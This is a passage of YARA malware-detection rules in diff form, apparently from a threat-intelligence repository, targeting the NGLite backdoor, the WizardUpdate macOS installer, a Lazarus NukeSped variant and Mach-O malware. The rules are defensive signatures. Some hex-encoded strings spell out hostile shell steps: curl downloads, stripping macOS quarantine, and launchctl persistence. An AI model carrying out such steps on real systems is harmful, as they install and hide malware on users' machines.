2 of ($s*)) +} +rule ARKBIRD_SOLG_MAL_Nglite_Nov_2021_2 : FILE +{ + meta: + description = "Detect NGLite backdoor (version B)" + author = "Arkbird_SOLG" + id = "e18f2891-366b-5cff-a17e-63523bfd9cee" + date = "2021-11-08" + modified = "2021-11-09" + reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-08/NGLite/MAL_NGLite_Nov_2021_2.yara#L1-L19" + license_url = "N/A" + logic_hash = "4d44d208010ca17f47f597f7d9eb5ee39d91a2d9077218a173ef0015699dc296" + score = 75 + quality = 75 + tags = "FILE" + hash1 = "3f868ac52916ebb6f6186ac20b20903f63bc8e9c460e2418f2b032a207d8f21d" + hash2 = "805b92787ca7833eef5e61e2df1310e4b6544955e812e60b5f834f904623fd9f" + tlp = "white" + adversary = "-" + + strings: + $s1 = { 8b 05 64 ?? bf 00 8d 0d e0 ?? c6 00 89 04 24 89 4c 24 04 c7 44 24 08 08 02 00 00 e8 d0 1d 00 00 8b 44 24 0c 85 c0 74 2e 3d 08 02 00 00 77 27 8d 1d e0 ?? c6 00 c6 04 03 5c 40 89 05 24 ?? c6 00 e9 0b ff ff ff 31 c0 e8 44 9f 02 00 ba 09 02 00 00 e8 6a 9f 02 00 8d 05 ?? 7b 8a 00 89 04 24 c7 44 24 04 24 00 00 00 e8 a4 3b 00 00 31 c0 e8 1d 9f 02 00 90 e8 57 86 02 } + $s2 = { 83 ec 40 c7 44 24 18 00 00 00 00 c7 44 24 14 00 00 00 00 8b 05 70 ?? bf 00 89 04 24 c7 44 24 04 ff ff ff ff 8d 44 24 18 89 44 24 08 8d 44 24 14 89 44 24 0c e8 21 15 00 00 8b 44 24 10 85 c0 74 32 31 c0 31 c9 eb 03 40 89 d1 83 f8 20 7d 20 19 d2 89 cb 89 c1 bd 01 00 00 00 d3 e5 21 d5 23 6c 24 18 85 ed 74 05 8d 53 01 eb dc 89 da eb d8 85 c9 75 2d 8d 7c 24 1c 31 c0 e8 63 98 02 00 8b 0d 60 ?? bf 00 89 0c 24 8d 4c 24 1c 89 4c 24 04 e8 46 14 00 00 8b 4c 24 30 89 4c 24 44 83 c4 40 c3 89 4c 24 44 83 c4 40 c3 e8 4d 7d 02 00 e9 38 } + $s3 = { 0f b6 2c 13 95 80 f8 80 95 72 f0 c7 44 24 20 00 00 00 00 8b 0d 7c ?? bf 00 89 0c 24 89 44 24 04 8d 4c 24 20 89 4c 24 08 e8 77 0b 00 00 8b 44 24 0c 85 c0 75 4a c7 44 24 1c 00 00 00 00 8b 05 20 ?? bf 00 89 04 24 8b 44 24 24 89 44 24 04 8b 44 24 30 89 44 24 08 8b 44 24 34 89 44 24 0c 8d 44 24 1c 89 44 24 10 c7 44 24 14 00 00 00 00 e8 f1 0b 00 00 8b 44 24 1c 89 44 24 38 83 c4 28 c3 8b 44 24 24 89 04 24 8b 44 24 30 89 44 24 04 8b 44 24 34 89 44 24 08 e8 59 00 00 00 8b 44 24 } + $s4 = { 83 ec 50 c7 44 24 24 00 00 00 00 8b 05 88 ?? bf 00 89 04 24 c7 44 24 04 ff ff ff ff c7 44 24 08 fe ff ff ff c7 44 24 0c ff ff ff ff 8d 44 24 24 89 44 24 10 c7 44 24 14 00 00 00 00 c7 44 24 18 00 00 00 00 c7 44 24 1c 02 00 00 00 e8 09 04 00 00 64 8b 05 14 00 00 00 8b 80 00 00 00 00 8b 40 18 84 00 05 68 01 00 00 89 04 24 8b 44 24 24 89 44 24 04 e8 d2 86 fd ff 8d 7c 24 34 31 c0 e8 60 86 02 00 8b 05 30 ?? bf 00 89 04 24 8d 44 24 34 89 44 24 04 8d 44 24 34 89 44 24 08 c7 44 24 0c 1c 00 00 00 e8 b1 02 00 00 8b 44 24 } + $s5 = { 8b 05 94 ?? bf 00 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 10 00 00 00 00 e8 ed 05 00 00 8b 44 24 14 8b 4c 24 1c 89 81 b4 01 00 00 85 c0 74 7e 8b 05 94 ?? bf 00 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 10 00 00 00 00 e8 ad 05 00 00 8b 44 24 14 8b 4c 24 1c 89 81 b8 01 00 00 85 c0 74 04 83 c4 18 c3 8d 05 ?? ?? 8b 00 89 04 24 e8 c9 6c 02 00 8b 05 98 ?? bf 00 8b 4c 24 1c 8b 91 b4 01 00 00 89 04 24 89 54 24 04 e8 ad 04 00 00 8b 44 24 1c c7 80 b4 01 } + + condition: + uint16(0)==0x5a4d and filesize >40KB and 4 of ($s*) +} +rule ARKBIRD_SOLG_MAL_Nglite_Nov_2021_1 : FILE +{ + meta: + description = "Detect NGLite backdoor (version A)" + author = "Arkbird_SOLG" + id = "cf2845f3-1176-5197-9d05-f123b0f23c75" + date = "2021-11-09" + modified = "2021-11-09" + reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-08/NGLite/MAL_NGLite_Nov_2021_1.yara#L1-L19" + license_url = "N/A" + logic_hash = "ebafc52da76b9a960ee3c2c99955fb5dcb4acff2b7a0d7fad714bfc17617331a" + score = 75 + quality = 75 + tags = "FILE" + hash1 = "7e4038e18b5104683d2a33650d8c02a6a89badf30ca9174576bf0aff08c03e72" + hash2 = "3da8d1bfb8192f43cf5d9247035aa4445381d2d26bed981662e3db34824c71fd" + tlp = "white" + adversary = "-" + + strings: + $s1 = { 48 8b 05 48 e7 90 00 48 8d 0d 99 4b 99 00 48 89 04 24 48 89 4c 24 08 48 c7 44 24 10 08 02 00 00 e8 82 21 00 00 48 8b 44 24 18 48 85 c0 74 33 48 3d 08 02 00 00 77 2b 48 8d 1d 69 4b 99 00 c6 04 03 5c 48 ff c0 48 89 05 4b 3f 99 00 e9 d6 fe ff ff 31 c0 e8 8f fc 02 00 ba 09 02 00 00 e8 b5 fc 02 00 48 8d 05 fe d5 55 00 48 89 04 24 48 c7 44 24 08 24 00 00 00 e8 cc 44 00 00 31 c0 e8 65 fc 02 00 90 e8 af d2 02 } + $s2 = { 48 83 ec 70 48 89 6c 24 68 48 8d 6c 24 68 48 c7 44 24 30 00 00 00 00 48 c7 44 24 28 00 00 00 00 48 8b 05 bf dc 90 00 48 89 04 24 48 c7 44 24 08 ff ff ff ff 48 8d 44 24 30 48 89 44 24 10 48 8d 44 24 28 48 89 44 24 18 e8 39 17 00 00 48 83 7c 24 20 00 74 35 31 c0 31 c9 eb 24 48 89 ca 48 89 c1 bb 01 00 00 00 48 d3 e3 48 23 5c 24 30 48 8d 72 01 48 85 db 48 0f 45 d6 48 ff c0 48 89 d1 48 83 f8 40 7c d6 48 85 c9 75 3e 0f 57 c0 0f 11 44 24 38 0f 11 44 24 48 0f 11 44 24 58 48 8b 05 23 dc 90 00 48 89 04 24 48 8d 44 24 38 48 89 44 24 08 e8 10 16 00 00 8b 44 24 58 89 44 24 78 48 8b 6c 24 68 48 83 c4 70 c3 89 4c 24 78 48 8b 6c 24 68 48 } + $s3 = { 48 8b 05 60 cc 90 00 48 89 04 24 0f 57 c0 0f 11 44 24 08 0f 11 44 24 18 e8 02 07 00 00 48 8b 44 24 28 48 8b 4c 24 40 48 89 81 10 03 00 00 48 85 c0 0f 84 80 00 00 00 48 8b 05 29 cc 90 00 48 89 04 24 0f 57 c0 0f 11 44 24 08 0f 11 44 24 18 e8 cb 06 00 00 48 8b 44 24 28 48 8b 4c 24 40 48 89 81 18 03 00 00 48 85 c0 74 0a 48 8b 6c 24 30 48 83 c4 38 c3 48 8d 05 ac e0 56 00 48 89 04 24 e8 1b b6 02 00 48 8b 05 e4 cb 90 00 48 8b 4c 24 40 48 8b 91 10 03 00 00 48 89 04 24 48 89 54 24 08 e8 5a 05 00 00 48 8b 44 24 40 48 c7 80 10 03 00 00 00 00 00 00 eb b3 48 8d 05 61 e0 56 00 48 89 04 24 e8 d8 b5 02 00 e9 6b ff ff ff 48 8b 6c 24 30 48 83 c4 38 } + $s4 = { 48 81 ec a0 00 00 00 48 89 ac 24 98 00 00 00 48 8d ac 24 98 00 00 00 48 c7 44 24 48 00 00 00 00 48 8b 05 8a c9 90 00 48 89 04 24 48 c7 44 24 08 ff ff ff ff 48 c7 44 24 10 fe ff ff ff 48 c7 44 24 18 ff ff ff ff 48 8d 44 24 48 48 89 44 24 20 0f 57 c0 0f 11 44 24 28 48 c7 44 24 38 02 00 00 00 e8 3b 05 00 00 65 48 8b 04 25 28 00 00 00 48 8b 80 00 00 00 00 48 8b 40 30 48 8b 4c 24 48 48 87 88 78 02 00 00 0f 57 c0 0f 11 44 24 68 0f 11 44 24 78 0f 11 84 24 88 00 00 00 48 8b 05 5f c8 90 00 48 89 04 24 48 8d 44 24 68 48 89 44 24 08 48 8d 44 24 68 48 89 44 24 10 48 c7 44 24 18 30 00 00 00 e8 59 03 00 00 48 83 7c 24 20 } + $s5 = { 48 8b 15 26 29 92 00 48 89 14 24 48 89 4c 24 08 48 89 44 24 10 48 c7 44 24 18 00 10 00 00 48 c7 44 24 20 04 00 00 00 e8 71 64 01 00 48 83 7c 24 28 00 40 0f 94 c6 48 8b 44 24 38 48 8b 4c 24 48 48 8b 54 24 68 48 8b 5c 24 40 e9 61 ff ff ff 48 8b 6c 24 50 48 83 c4 58 c3 48 8b 6c 24 50 48 83 c4 58 c3 e8 25 91 01 00 48 8d 05 e2 b8 56 00 48 89 04 24 48 c7 44 24 08 19 00 00 00 e8 bc 9a 01 00 48 8b 44 24 38 48 89 04 24 e8 be 97 01 00 48 8d 05 9a b1 56 00 48 89 04 24 48 c7 44 24 08 19 00 00 00 e8 95 9a 01 00 8b 44 24 34 48 89 04 24 e8 98 97 01 00 e8 73 93 01 00 e8 5e 91 01 00 48 8d } + + condition: + uint16(0)==0x5a4d and filesize >40KB and 4 of ($s*) +} +rule ARKBIRD_SOLG_MAL_OSX_Wizardupdate_Oct_2021_2 : FILE +{ + meta: + description = "Detect a structure like the bash of WizardUpdate installer on OSX system" + author = "Arkbird_SOLG" + id = "3e48c2fa-10f4-5152-90e6-f5f8cc507103" + date = "2021-10-22" + modified = "2021-10-23" + reference = "https://twitter.com/MsftSecIntel/status/1451279679059488773" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-23/WizardUpdate/MAL_OSX_WizardUpdate_Oct_2021_2.yara#L1-L20" + license_url = "N/A" + logic_hash = "99d3323e3c155be040fef3beea0a55aec9bd3178df822d5fd6530864186446ed" + score = 75 + quality = 67 + tags = "FILE" + hash1 = "eafacc44666901a5ea3c81a128e5dd88d0968a400d74ef1da5c2c05dc6dd7a39" + tlp = "White" + adversary = "-" + + strings: + $s1 = { 24 28 65 76 61 6c 20 65 63 68 6f 20 7e 24 28 65 63 68 6f 20 24 55 53 45 52 29 29 } + $s2 = { 69 66 20 5b 20 21 20 2d 66 20 22 24 [5-15] 22 20 5d 3b 20 74 68 65 6e } + $s3 = { 63 75 72 6c 20 2d 2d 72 65 74 72 79 20 [2-3] 2d 66 20 22 } + $s4 = { 78 61 74 74 72 20 2d 72 20 2d 64 20 63 6f 6d 2e 61 70 70 6c 65 2e 71 75 61 72 61 6e 74 69 6e 65 } + $s5 = { 6c 61 75 6e 63 68 63 74 6c 20 6c 6f 61 64 20 2d 77 } + $s6 = { 63 68 6f 77 6e 20 2d 52 20 24 55 53 45 52 } + $s7 = { 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 5c 22 31 2e 30 5c 22 20 65 6e 63 6f 64 69 6e 67 3d 5c 22 55 54 46 2d 38 5c 22 3f 3e 0a 09 3c 21 44 4f 43 54 59 50 45 20 70 6c 69 73 74 20 50 55 42 4c 49 43 20 5c 22 2d 2f 2f 41 70 70 6c 65 2f 2f 44 54 44 20 50 4c 49 53 54 20 31 2e 30 2f 2f 45 4e 5c 22 20 5c 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 70 70 6c 65 2e 63 6f 6d 2f 44 54 44 73 2f 50 72 6f 70 65 72 74 79 4c 69 73 74 2d 31 2e 30 2e 64 74 64 5c 22 3e 0a 09 3c 70 6c 69 73 74 20 76 65 72 73 69 6f 6e 3d 5c 22 31 2e 30 5c 22 3e } + + condition: + filesize >2KB and 6 of ($s*) +} +rule ARKBIRD_SOLG_MAL_OSX_Wizardupdate_Oct_2021_1 : FILE +{ + meta: + description = "Detect WizardUpdate installer on OSX system" + author = "Arkbird_SOLG" + id = "50974725-6b45-5f2f-aa76-ae73dc752873" + date = "2021-10-22" + modified = "2021-10-23" + reference = "https://twitter.com/MsftSecIntel/status/1451279679059488773" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-23/WizardUpdate/MAL_OSX_WizardUpdate_Oct_2021_1.yara#L1-L21" + license_url = "N/A" + logic_hash = "b25145a9aa33c9518e5e0847b50faa8b67d65078ddfbb66de49196a17ddd3137" + score = 75 + quality = 75 + tags = "FILE" + hash1 = "939cebc99a50989ffbdbb2a6727b914fc9b2382589b4075a9fd3857e99a8c92a3" + hash2 = "c5017798275f054ae96c69f5dd0b378924c6504a70c399279bbf7f33d990d45b" + hash3 = "7067e6a69a8f5fdbabfb00d03320cfc2f3584a83304cbeeca7e8edc3d57bbbd4" + tlp = "White" + adversary = "-" + + strings: + $s1 = { 48 89 e5 48 83 ec 70 48 89 7d f0 48 c7 45 e0 00 00 00 00 b8 01 00 00 00 48 89 c7 48 89 c6 e8 b8 3b 00 00 31 c9 89 cf 48 89 45 d8 48 c7 45 d0 00 00 00 00 e8 a9 3b 00 00 48 8b 7d f0 48 8d 35 d4 3f 00 00 89 45 cc e8 ba 3b 00 00 48 89 45 e8 48 83 7d e8 00 0f 85 0d 00 00 00 48 c7 45 f8 00 00 00 00 e9 cd 00 00 00 e9 00 00 00 00 48 8b 55 e8 48 8d 7d e0 48 8d 75 d0 e8 70 3b 00 00 48 83 f8 ff 0f 84 9c 00 00 00 48 8b 7d d8 48 8b 45 d8 48 89 7d c0 48 89 c7 e8 76 3b 00 00 48 8b 7d e0 48 89 45 b8 e8 69 3b 00 00 48 8b 4d b8 48 01 c1 48 81 c1 01 00 00 00 48 8b 7d c0 48 89 ce e8 49 3b 00 00 48 89 45 d8 48 8b 45 d8 48 8b 7d d8 48 89 45 b0 e8 3a 3b 00 00 48 8b 4d b0 48 01 c1 48 8b 75 e0 48 8b 7d e0 48 89 4d a8 48 89 75 a0 e8 1e 3b 00 00 48 05 01 00 00 00 48 8b 7d a8 48 8b 75 a0 48 89 c2 e8 0e 3b 00 00 48 8b 7d e0 48 89 45 98 e8 d1 3a 00 00 48 c7 45 } + $s2 = { 48 89 e5 48 81 ec 80 01 00 00 48 89 f8 48 8b 0d 7b 31 00 00 48 8b 09 48 89 4d f8 48 89 bd e8 fe ff ff c6 85 e7 fe ff ff 00 48 89 bd b8 fe ff ff 48 89 b5 b0 fe ff ff 48 89 85 a8 fe ff ff e8 9c 01 00 00 c7 85 d4 fe ff ff 00 01 00 00 48 8d 35 0a 2e 00 00 48 8b bd b0 fe ff ff e8 df 28 00 00 e9 00 00 00 00 48 8b bd b0 fe ff ff e8 8e 01 00 00 48 8d 35 ec 2d 00 00 48 89 c7 e8 5b 29 00 00 48 89 85 a0 fe ff ff e9 00 00 00 00 48 8b 85 a0 fe ff ff 48 89 85 d8 fe ff ff 48 83 bd d8 fe ff ff 00 0f 84 c4 00 00 00 e9 00 00 00 00 48 8b bd d8 fe ff ff e8 04 29 00 00 89 85 9c fe ff ff e9 00 00 00 00 8b 85 9c fe ff ff 83 f8 00 0f 95 c1 80 f1 ff f6 c1 01 0f 85 05 00 00 00 e9 75 00 00 00 48 8b 95 d8 fe ff ff 48 8d bd f0 fe ff ff be 00 01 00 00 e8 ca 28 00 00 48 89 85 90 fe ff ff e9 00 00 00 00 48 8b 85 90 fe ff ff 48 83 f8 00 0f 84 3b 00 00 00 48 8d b5 f0 fe ff ff 48 8b bd b8 fe ff ff } + $s3 = "11101000010110101110100011010010110110101100101011011110111010101110100001000000011100100110000001100000010000000101101010011000010000000100010011010000111010001110100011100000111001100111010001011110010111101101101" + $s4 = { 48 8b bd d8 fe ff ff e8 73 28 00 00 e9 00 00 00 00 e9 00 00 00 00 c6 85 e7 fe ff ff 01 f6 85 e7 fe ff ff 01 0f 85 0c 00 00 00 48 8b bd b8 fe ff ff e8 cb 27 00 00 48 8b 05 fc 2f 00 00 48 8b 00 48 8b 4d f8 48 39 c8 0f 85 32 00 00 00 48 8b 85 a8 fe ff ff 48 81 c4 80 01 00 } + + condition: + uint32(0)==0xFEEDFACF and filesize >50KB and (($s1 and $s3) or ($s2 and $s4)) +} +rule ARKBIRD_SOLG_APT_Lazarus_Jun_2021_1 : FILE +{ + meta: + description = "Detect a variant of NukeSped malware" + author = "Arkbird_SOLG" + id = "0f5d42c0-d6dc-573b-9227-787ccbcaa83d" + date = "2021-06-19" + modified = "2021-06-21" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-19/Lazarus/APT_Lazarus_Jun_2021_1.yara#L1-L20" + license_url = "N/A" + logic_hash = "ea4ce93d54b9b8e5d1d5bb64d37ac26839e2fa3200da3057597d83c4be6d129f" + score = 75 + quality = 75 + tags = "FILE" + hash1 = "5c2f339362d0cd8e5a8e3105c9c56971087bea2701ea3b7324771b0ea2c26c6c" + hash2 = "2dff6d721af21db7d37fc1bd8b673ec07b7114737f4df2fa8b2ecfffbe608a00" + hash3 = "1177105e51fa02f9977bd435f9066123ace32b991ed54912ece8f3d4fbeeade4" + tlp = "White" + adversary = "Lazarus" + + strings: + $seq1 = { 48 8b ce e8 8a 2c 00 00 48 8b d8 48 85 c0 0f 84 28 06 00 00 4c 8b c6 33 d2 48 8b c8 e8 11 56 00 00 8d 4e fc 48 8d 57 04 4c 63 c1 48 8b cb e8 af 3a 00 00 33 c0 48 8d 4c 24 30 48 89 4c 24 28 45 33 c9 4c 8b c3 33 d2 33 c9 89 44 24 30 89 44 24 20 ff 15 4b 49 01 00 48 85 c0 0f 84 d4 05 00 00 ba 88 13 00 00 48 8b c8 ff 15 9c 2c 02 00 48 8d 8d 91 00 00 00 33 d2 41 b8 ff 03 00 00 c6 85 90 00 00 00 00 e8 a9 55 00 00 48 8d 15 02 c1 01 00 48 8d 8d 90 00 00 00 e8 16 2b 00 00 48 8d 85 90 00 00 00 48 83 cb ff 48 ff c3 80 3c 18 00 75 f7 41 b2 84 ba 43 90 21 57 41 b8 c2 a2 a9 09 85 db 0f 8e 4b 05 00 00 4c 8d 8d 90 00 00 00 44 8b db 66 90 41 0f b6 01 41 0f b6 c8 4d 8d 49 01 32 ca 41 32 c2 44 22 d1 41 32 c0 42 8d 0c c5 00 00 00 00 32 c2 41 33 c8 41 88 41 ff 81 e1 f8 07 00 00 41 0f b6 c0 22 c2 c1 e1 14 44 32 d0 41 8b c0 44 8b c1 c1 e8 08 8d 0c 12 33 ca 44 0b c0 8b c2 c1 e1 04 c1 e0 07 33 ca 83 e1 80 33 c8 8b c2 c1 e1 11 c1 e8 08 8b d1 0b d0 49 ff } + $seq2 = { 48 8d ac 24 50 ff ff ff 48 81 ec b0 01 00 00 48 8b 05 82 09 02 00 48 33 c4 48 89 85 a0 00 00 00 44 8b 25 d5 38 02 00 4c 8b f9 48 8d 4d 91 33 d2 41 b8 03 01 00 00 c6 45 90 00 e8 59 66 00 00 b9 3c 00 00 00 ff 15 f6 3c 02 00 ff 15 88 59 01 00 8b c8 e8 51 42 00 00 e8 20 42 00 00 b9 3c 00 00 00 8b d8 83 e3 03 83 c3 08 ff 15 d1 3c 02 00 ff 15 63 59 01 00 8b c8 e8 2c 42 00 00 e8 fb 41 00 00 b9 3c 00 00 00 8b f8 83 e7 01 83 c7 05 ff 15 ac 3c 02 00 ff 15 3e 59 01 00 8b c8 e8 07 42 00 00 e8 d6 41 00 00 8b f0 b8 ab aa aa aa f7 e6 d1 ea 8d 0c 52 2b f1 83 eb 08 0f 84 30 03 00 00 ff cb 0f 84 68 02 00 00 ff cb 0f 84 9a 01 00 00 ff cb 0f 85 ef 04 00 00 8d 4b 3c ff 15 60 3c 02 00 ff 15 f2 58 01 00 8b c8 e8 bb 41 00 00 e8 8a 41 00 00 8b d8 b8 1f 85 eb 51 f7 e3 c1 ea 03 6b ca 19 2b d9 b9 3c 00 00 00 83 c3 0a ff 15 2f 3c 02 00 ff 15 c1 58 01 00 8b c8 e8 8a 41 00 00 e8 59 41 00 00 44 8b f0 b8 ab aa aa aa 41 f7 e6 c1 ea 02 8d 0c 52 03 c9 44 2b f1 b9 3c 00 00 00 41 81 c6 d7 07 00 00 ff 15 f5 3b 02 00 ff 15 87 58 01 00 8b c8 e8 50 41 00 00 e8 1f 41 00 00 44 8b e8 b8 ab aa aa aa 41 f7 e5 c1 ea 03 8d 0c 52 c1 e1 02 44 2b e9 b9 3c 00 00 00 41 ff c5 ff 15 be 3b 02 00 ff 15 50 58 01 00 8b c8 e8 19 41 00 00 e8 e8 40 00 00 44 8b c0 b8 09 cb 3d 8d 41 f7 e0 c1 ea 04 6b ca 1d 44 2b c1 b9 7d 00 00 00 41 ff c0 44 89 44 24 74 e8 3e 3b 00 00 33 d2 44 8d 42 7d 48 8b c8 e8 d0 64 00 00 4c 8d 44 24 70 48 8d 0d d4 ce 01 00 ba 7c 00 00 00 c7 44 24 70 00 00 00 00 e8 c2 27 00 00 44 8b 44 24 70 48 8b d0 48 8b c8 48 89 44 24 78 e8 3d 25 00 00 48 8b 44 24 78 4c 8d 45 90 48 8b d0 4c 2b c0 0f 1f 40 00 66 66 0f 1f 84 00 00 00 00 00 0f b6 0a 48 8d 52 01 41 88 4c 10 ff 84 c9 75 f0 48 8b c8 e8 88 3a 00 00 8b 44 24 74 44 89 64 24 48 89 5c 24 40 89 44 24 38 44 89 6c 24 30 48 8d 55 90 44 8b cf 41 b8 04 00 00 00 49 8b cf 44 89 74 24 28 89 74 24 20 e8 b4 39 00 00 e9 5d 03 00 00 b9 3c 00 00 00 ff 15 cc 3a 02 00 ff 15 5e 57 01 00 8b c8 e8 27 40 00 00 e8 f6 3f 00 00 b9 79 00 00 00 8b d8 83 e3 03 e8 63 3a 00 00 33 d2 44 8d 42 79 48 8b c8 e8 f5 63 00 00 4c 8d 44 24 70 48 8d 0d 79 cd 01 00 ba 78 00 00 00 c7 44 24 70 00 00 00 00 e8 e7 26 00 00 44 8b 44 24 70 48 8b d0 48 8b c8 4c 8b f0 e8 64 24 00 00 4c 8d 45 90 49 8b d6 4d 2b c6 66 66 0f 1f 84 00 00 00 00 00 0f b6 0a 48 8d 52 01 41 88 4c 10 ff 84 c9 75 f0 49 8b ce e8 b8 39 00 00 44 89 64 24 38 8d 43 04 89 44 24 30 44 8d 4b 08 48 8d 55 90 41 b8 04 00 00 00 49 8b cf 89 74 24 28 89 } + $seq3 = { 48 89 5c 24 18 55 56 57 48 83 ec 70 48 8b 05 9d fe 01 00 48 33 c4 48 89 44 24 60 33 c0 48 8b d9 8b fa 8d 48 20 c6 44 24 48 00 48 89 44 24 49 48 89 44 24 51 e8 d7 31 00 00 48 8d 15 44 c6 01 00 48 8b f0 33 c0 48 8d 4c 24 48 48 89 06 48 89 46 08 48 89 46 10 4c 8b c3 48 89 46 18 e8 3f 13 00 00 48 8d 4c 24 48 ff 15 ac 50 01 00 bd 02 00 00 00 0f b7 cf 89 44 24 3c 66 89 6c 24 38 ff 15 a5 2e 02 00 8d 55 ff 44 8d 45 04 8b cd 66 89 44 24 3a ff 15 01 32 02 00 48 8b f8 48 83 f8 ff 75 20 48 8d 15 e1 c5 01 00 48 8b ce e8 81 30 00 00 48 0b df 48 ff c3 80 3c 1e 00 75 f7 e9 c9 00 00 00 48 8d 54 24 38 41 b8 10 00 00 00 48 8b c8 ff 15 f4 31 02 00 83 f8 ff 75 6b 48 8d 15 a8 c5 01 00 48 8b ce e8 48 30 00 00 48 83 cb } + $seq4 = { 40 55 48 8d ac 24 e0 fb ff ff 48 81 ec 20 05 00 00 48 8b 05 b8 fc 01 00 48 33 c4 48 89 85 10 04 00 00 48 8d 8d f1 00 00 00 33 d2 41 b8 03 01 00 00 c6 85 f0 00 00 00 00 e8 93 59 00 00 48 8d 8d 01 02 00 00 33 d2 41 b8 07 02 00 00 c6 85 00 02 00 00 00 e8 78 59 00 00 48 8d 4d e1 33 d2 41 b8 03 01 00 00 c6 45 e0 00 e8 63 59 00 00 48 8d 95 f0 00 00 00 41 b8 f4 01 00 00 33 c9 ff 15 2e 30 02 00 85 c0 0f 84 5e 01 00 00 48 8d 55 e0 b9 f4 01 00 00 48 89 9c 24 30 05 00 00 48 89 bc 24 38 05 00 00 ff 15 17 30 02 00 4c 8d 05 20 15 02 00 48 8d 4d e0 ba 04 01 00 00 e8 5a 37 00 00 48 8d 45 e0 4c 8d 0d f7 14 02 00 48 89 44 24 28 48 8d 85 f0 00 00 00 4c 8d 85 f0 00 00 00 48 8d 15 dd c3 01 00 48 8d 8d 00 02 00 00 48 89 44 24 20 e8 fc 10 00 00 33 ff 48 8d 4d e0 48 89 7c 24 30 44 8d 47 03 45 33 c9 ba 00 00 00 40 c7 44 24 28 80 00 00 00 c7 44 24 20 02 00 00 00 ff 15 6f 2f 02 00 48 8b d8 } + $seq5 = { 48 89 5c 24 10 48 89 74 24 18 48 89 7c 24 20 55 48 8d ac 24 70 f2 ff ff 48 81 ec 90 0e 00 00 48 8b 05 da ed 01 00 48 33 c4 48 89 85 80 0d 00 00 48 8b f1 48 8d 8d 81 05 00 00 33 d2 41 b8 ff 07 00 00 c6 85 80 05 00 00 00 e8 b2 4a 00 00 48 8d 4d 71 33 d2 41 b8 03 01 00 00 c6 45 70 00 e8 9d 4a 00 00 33 c0 c6 44 24 50 00 39 05 f4 1c 02 00 89 44 24 51 75 0b e8 b5 dd ff ff 89 05 e3 1c 02 00 48 8d 4d 70 e8 c6 e3 ff ff 8b 05 e8 b5 01 00 48 8d 8d 81 01 00 00 89 44 24 50 0f b6 05 da b5 01 00 33 d2 41 b8 ff 03 00 00 c6 85 80 01 00 00 00 88 44 24 54 e8 46 4a 00 00 48 8d 15 3f b6 01 00 48 8d 8d 80 01 00 00 e8 b3 1f 00 00 48 8d 4d 90 33 d2 0f 10 05 b6 b6 01 00 0f 10 0d bf b6 01 00 41 b8 d4 00 00 00 0f 29 44 24 60 0f 29 4c 24 70 0f 10 05 b8 b6 01 00 0f 29 45 80 e8 ff 49 00 00 48 83 cb ff 48 8b c3 0f 1f 84 } + + condition: + uint16(0)==0x5a4d and filesize >60KB and 4 of ($seq*) +} +rule ARKBIRD_SOLG_MAL_Mailo_Jun_2021_1 : FILE +{ + meta: + description = "Detect the Mach-O malware" + author = "Arkbird_SOLG" + id = "4c975200-fce4-5a2a-b565-6d397c4e0b1c" + date = "2021-06-09" + modified = "2021-06-21" + reference = "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-19/MAIL-O/MAL_MailO_Jun_2021_1.yara#L1-L19" + license_url = "N/A" + logic_hash = "165c5fd90039c14ef1fa1e80bb7f14761e991b09560c5f1da2ddf9a0eadee623" + score = 75 + quality = 75 + tags = "FILE" + hash1 = "3a77f108e32b34e184f9ade66292cd73abbd297b4829ba63a973a400cc7f3f9f" + hash2 = "603881f4c80e9910ab22f39717e8b296910bff08cd0f25f78d5bff1ae0dce5d7" + tlp = "White" + adversary = "TA428" + + strings: + $seq1 = { 48 8b ce e8 9e 0c f9 ff 48 8b 5c 24 20 48 8b 4c 24 28 49 8b d7 41 ff c5 ff 15 20 72 08 00 4c 8b f8 48 85 c0 0f 85 4c ff ff ff 48 8b b4 24 88 00 00 00 48 8b 4c 24 28 33 d2 ff 15 f7 71 08 00 4c 8b ac 24 90 00 00 00 4d 85 e4 0f 84 7f 01 00 00 48 8b ac 24 80 00 00 00 4d 8b c4 48 8b cd 48 8b d6 ff 53 48 49 8b cc 8b f0 e8 88 2c f8 ff 4c 8b bc 24 98 00 00 00 85 c0 0f 8e fb 00 00 00 0f 1f 84 00 00 00 00 00 41 8b d6 49 8b cc e8 95 2e f8 ff 48 8b f8 44 3b f6 75 75 49 89 07 e9 c4 00 00 00 48 8b 5c 24 20 45 33 c0 48 8b ce 41 8d 50 01 e8 a1 4b f9 ff 85 c0 0f 84 43 ff ff ff 49 8b d7 48 8b cb e8 ce e7 ff ff 48 8b d8 48 85 c0 0f 84 2c ff ff ff 49 8b cf ff 15 71 71 08 00 8b 15 ff e0 12 00 4c 8b c3 48 8b ce 48 89 03 e8 45 0c f9 ff 4d 85 e4 75 08 e8 2b 2b f8 ff 4c 8b e0 48 8b d6 49 8b cc e8 cd 2c f8 ff e9 fa fe ff ff 8b 15 ce e0 12 00 48 8b cf e8 ca 0b f9 ff 48 8b d8 48 85 c0 74 39 48 8b 48 10 ff 15 d8 70 08 00 48 8b 4b 08 33 d2 ff 15 d4 70 08 00 48 8b 0b 48 85 c9 74 06 ff 15 0e 71 08 00 41 b8 3a 06 00 00 48 8d 15 b1 71 0d 00 } + $seq2 = { 4c 8d 84 24 d0 00 00 00 4c 89 b4 24 90 01 00 00 48 8d 15 